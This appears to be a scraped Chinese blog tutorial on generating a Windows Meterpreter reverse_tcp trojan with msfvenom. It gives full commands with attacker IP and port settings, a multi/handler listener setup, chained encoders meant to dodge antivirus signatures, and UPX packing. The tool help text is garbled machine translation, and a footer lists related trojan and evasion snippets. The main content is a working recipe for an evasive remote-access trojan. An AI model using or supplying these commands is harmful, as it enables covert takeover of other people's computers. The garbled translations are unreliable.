msfvenom
选项:
-p, --payload 有效载荷使用。指定一个有效的自定义载荷
--payload-options 列出有效载荷的标准选项
-l, --list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有
-n, --nopsled 在一个nopsled [长度]的大小对有效载荷
-f, --format 输出格式(使用-一个列表的帮助格式)
--help-formats 列出可用的格式
-e, --encoder 使用的编码器
-a, --arch 使用的架构
--platform 有效载荷平台
--help-platforms list available平台
-s, --space 所得到的有效载荷的最大大小
--encoder-space 编码的有效载荷的最大大小(默认值为S的值)
-b, --bad-chars 人物避免实例列表:“x00xff”
-i, --iterations 编码有效负载的次数
-c, --add-code 指定一个额外的Win32文件包括shellcode
-x, --template 指定要使用的自定义可执行文件作为模板
-k, --keep 保存模板行为,并将有效载荷注入一个新线程
-o, --out 保存有效载荷
-v, --var-name 为特定的输出格式指定一个自定义变量名称
--smallest 产生最小可能的有效载荷
-h, --help 显示此消息

实例: (生成)

msfvenom -p(有效攻击载体) windows/meterpreter/reverse_tcp -e(使用编码器,理解成在什么平台运行) x86/shikata_ga_nai -i (编码次数,理解成混淆特征码)5 -b(特征码绕过) “\x00” lhost=192.168.11.227 lport=443(攻击者ip和监听端口) -f(输出的格式) exe > (输出成什么)payload.exe

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “\x00” lhost=192.168.0.7 lport=4444 -f exe > text.exe

Msf> use exploit/multi/handler #用于反向监听的模块
Msf exploit(handler)>set payload windows/meterpreter/reverse_tcp #选择攻击模块
Payload => windows/meterpreter/reverse_tcp
Msf exploit(hanler) > show options
Msf exploit(hanler) > set lhost 192.168.11.222
Msf exploit(hanler) > set lport 443
Msf exploit(hanler) > exploit #启用监听

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “\x00” lhost=192.168.11.227 lport=443 -f raw (生成可编译机器码)|(管道符传递) msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw |msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o text.exe (以上经过多次混淆代码 但文件依旧可以使用 )

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “\x00” lhost=192.168.0.7 lport=4444 -f raw | msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw |msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o text.exe

加壳 压缩 (使其成为透明)
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

命令:
-1 压缩更快 -9 压缩更好
-d 使减压; -l 表压缩文件
-t 测试压缩文件 -V 显示版本号
-h 给更多的帮助 -L 显示软件许可证
选项:
-q 安静模式 -v 是冗长的
-oFILE 写入输出到“文件”
-f 可疑文件的强制压缩
-k 保存备份文件
file.. 可执行文件(DE)压缩

类型“UPX --帮助更详细的帮助。
UPX 配备 ABSOLUTELY NO WARRANTY; 详情访问http://upx.sf.net

upx -5 text.exe

文末附加 upx详细参数解析 (未翻)

Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

命令:
-1 压缩更快 -9 压缩更好
-d 使减压; -l 表压缩文件
-t 测试压缩文件 -V 显示版本号
-h 给更多的帮助 -L 显示软件许可证
选项:
-q 安静模式 -v 是冗长的
-oFILE 写入输出到“文件”
-f 可疑文件的强制压缩
-k 保存备份文件
file.. 可执行文件(DE)压缩

--no-color, --mono, --color, --no-progress 改变外观

压缩优化选项:
--brute 尝试所有可用的压缩方法和过滤器 [slow]
--ultra-brute 尝试更多的压缩变种 [very slow]

备份选项:
-k, --backup 保持文件备份
--no-backup 没有备份文件[默认]

覆盖选项:
--overlay=copy 复制附加到文件的任何额外数据[默认]
--overlay=strip 带附加到文件的任何附加数据[DANGEROUS]
--overlay=skip 不要用覆盖来压缩文件

在 djgpp2/coff的选项:
--coff 产生COFF输出[默认]:EXE

可选择的:
--8086 使压缩的任何8086个工作

选择dos/exe:
--8086 使压缩exe在任何8086
--no-reloc 把没有搬迁到EXE头

选择dos/sys:
--8086 使压缩的系统工作在任何8086

选择生成 ps1/exe:
--8-bit 使用8位大小压缩[默认值:32位]
--8mib-ram 8 MB内存限制[默认:2 MIB ]
--boot-only 禁用客户端/主机传输兼容性
--no-align 不要对齐到2048个字节[使:-控制台运行]

选择生成watcom/le:
--le 产生了输出[默认]:EXE

选择生成 win32/pe, rtm32/pe & arm/pe:
--compress-exports=0 不要压缩导出部分
--compress-exports=1 压缩导出部分[默认]
--compress-icons=0 不要压缩任何图标
--compress-icons=1 压缩所有,但第一个图标
--compress-icons=2 压缩所有,但第一个图标目录[默认]
--compress-icons=3 压缩所有图标
--compress-resources=0 不压缩任何资源
--keep-resource=list 不压缩列表指定的资源
--strip-relocs=0 不带迁移
--strip-relocs=1 带搬迁[默认]

选择生成 linux/elf:
--preserve-build-id 复制gnu.note.build-id压缩输出。

file.. 可执行文件(DE)压缩

此版本支持: (以下不在一一叙述 )
AMD64-darwin.macho Mach/AMD64
ARMEL-darwin.macho Mach/ARMEL
amd64-linux.elf linux/ElfAMD
amd64-linux.kernel.vmlinux vmlinux/AMD64
amd64-win64.pe win64/pe
arm-linux.elf linux/armel
arm-linux.kernel.vmlinux vmlinux/armel
arm-wince.pe arm/pe
armeb-linux.elf linux/armeb
armeb-linux.kernel.vmlinux vmlinux/armeb
armel-linux.kernel.vmlinuz vmlinuz/armel
fat-darwin.macho Mach/fat
i086-dos16.com dos/com
i086-dos16.exe dos/exe
i086-dos16.sys dos/sys
i386-bsd.elf.execve BSD/386
i386-darwin.macho Mach/i386
i386-dos32.djgpp2.coff djgpp2/coff
i386-dos32.tmt.adam tmt/adam
i386-dos32.watcom.le watcom/le
i386-freebsd.elf BSD/elf386
i386-linux.elf linux/elf386
i386-linux.elf.execve linux/386
i386-linux.elf.shell linux/sh386
i386-linux.kernel.bvmlinuz bvmlinuz/386
i386-linux.kernel.vmlinux vmlinux/386
i386-linux.kernel.vmlinuz vmlinuz/386
i386-netbsd.elf netbsd/elf386
i386-openbsd.elf opnbsd/elf386
i386-win32.pe win32/pe
m68k-atari.tos atari/tos
mips-linux.elf linux/mipseb
mipsel-linux.elf linux/mipsel
mipsel.r3000-ps1 ps1/exe
powerpc-darwin.macho Mach/ppc32
powerpc-linux.elf linux/ElfPPC
powerpc-linux.kernel.vmlinux vmlinux/ppc32

msfvenom木马生成+免杀+壳(实测并不能免杀)的更多相关文章

  1. 【黑客免杀攻防】读书笔记2 - 免杀与特征码、其他免杀技术、PE进阶介绍

    第3章 免杀与特征码 这一章主要讲了一些操作过程.介绍了MyCCL脚本木马免杀的操作,对于定位特征码在FreeBuf也曾发表过类似工具. VirTest5.0特征码定位器 http://www.fre ...

  2. MSFVENOM SHELLCODE生成备忘录

    MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHO ...

  3. Metasploit实现木马生成、捆绑、免杀

    原创博客,转载请注出处! 我的公众号,正在建设中,欢迎关注: Meatsploit介绍 2018/01/03 更新 Metasploit是一款优秀的开源(!= 完全免费)渗透测试框架平台,在该平台下可 ...

  4. 利用kali自带的msfvenom工具生成远程控制软件(木马)

    2.生成一个简单的木马 3. 4. 5. 6.接下来生成的winx64muma.exe实际演示 7.将生成的winx64muma.exe在受害者机器上运行 8.在kali下输入msfconsole 9 ...

  5. Msfvenom木马使用及TheFatRat工具

    msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUN ...

  6. Linux使用expect实现免手动密码输入,linux免密码登陆

    使用expect实现自动登录的脚本,网上有很多,可是都没有一个明白的说明,初学者一般都是照抄.收藏.可是为什么要这么写却不知其然.本文用一个最短的例子说明脚本的原理.  脚本代码如下:  ###### ...

  7. 9.利用msfvenom生成木马

    这篇文章来介绍一下msf中一个生成木马的msfvenom模块. msfvenom命令行选项如下: 英文原版: 中文版: Options: -p, --payload <payload> 指 ...

  8. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

    Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

  9. 【黑客免杀攻防】读书笔记15 - 源码免杀、C++壳的编写

    1.源码免杀 1.1 定位产生特征的源码 定位文件特征 1.根据MyCCL的特征码定位工具,定位出有特征的地址 2.根据VS的反汇编窗口,输入有特征的地址得到特征地址与源码的关系 3.插入Messag ...

随机推荐

  1. Spark之 spark简介、生态圈详解

    来源:http://www.cnblogs.com/shishanyuan/p/4700615.html 1.简介 1.1 Spark简介Spark是加州大学伯克利分校AMP实验室(Algorithm ...

  2. VMware ESXi 网卡

    esxcfg-vswitch -A "VMkernel09" vswitch0 esxcfg-vmknic -a "VMkernel09" -i 172.10. ...

  3. Erlang Web 监控工具

    转自http://www.cnblogs.com/me-sa/archive/2012/04/17/erlang-web-monitor.html  Erlang已经提供了一系列工具查看运行时状态查看 ...

  4. Top Android App使用的组件(应用)

    Top Android App使用的组件   唱吧_462 smack:de.measite.smack:??? ???:org.apache:??? smack:org.jivesoftware.s ...

  5. 学习笔记之C# 教程 | 菜鸟教程

    C# 教程 | 菜鸟教程 http://www.runoob.com/csharp/csharp-tutorial.html 菜鸟教程在线编辑器 http://www.runoob.com/try/r ...

  6. logger示例

    胜哥版 打印日志是很多程序的重要需求,良好的日志输出可以帮我们更方便的检测程序运行状态.Python标准库提供了logging模块,让我们也可以方便的在Python中打印日志. 日志介绍 完整的使用方 ...

  7. 利用U盘安装Redhat-server-Linux-7.1

    利用U盘安装Redhat-server-Linux-7.1 [原]红帽 Red Hat Linux相关产品iso镜像下载[百度云]

  8. 全面解析python类的绑定方法与非绑定方法

    类中的方法有两类: 绑定方法 非绑定方法 一.绑定方法 1.对象的绑定方法 首先我们明确一个知识点,凡是类中的方法或函数,默认情况下都是绑定给对象使用的.下面,我们通过实例,来慢慢解析绑定方法的应用. ...

  9. findbug、p3c、checkstyle、sonar安装使用

    idea插件安装方式: Preferences—>Plugins—>查找插件—>Install Preferences—>Plugins—>Install plug fr ...

  10. shell脚本实现tomcat进程—查、杀、启

    #!/bin/bash#获取XXX项目进程IDXXXpid=`ps -ef | grep XXX | grep -v grep | awk '{print $2}'` echo "XXX项目 ...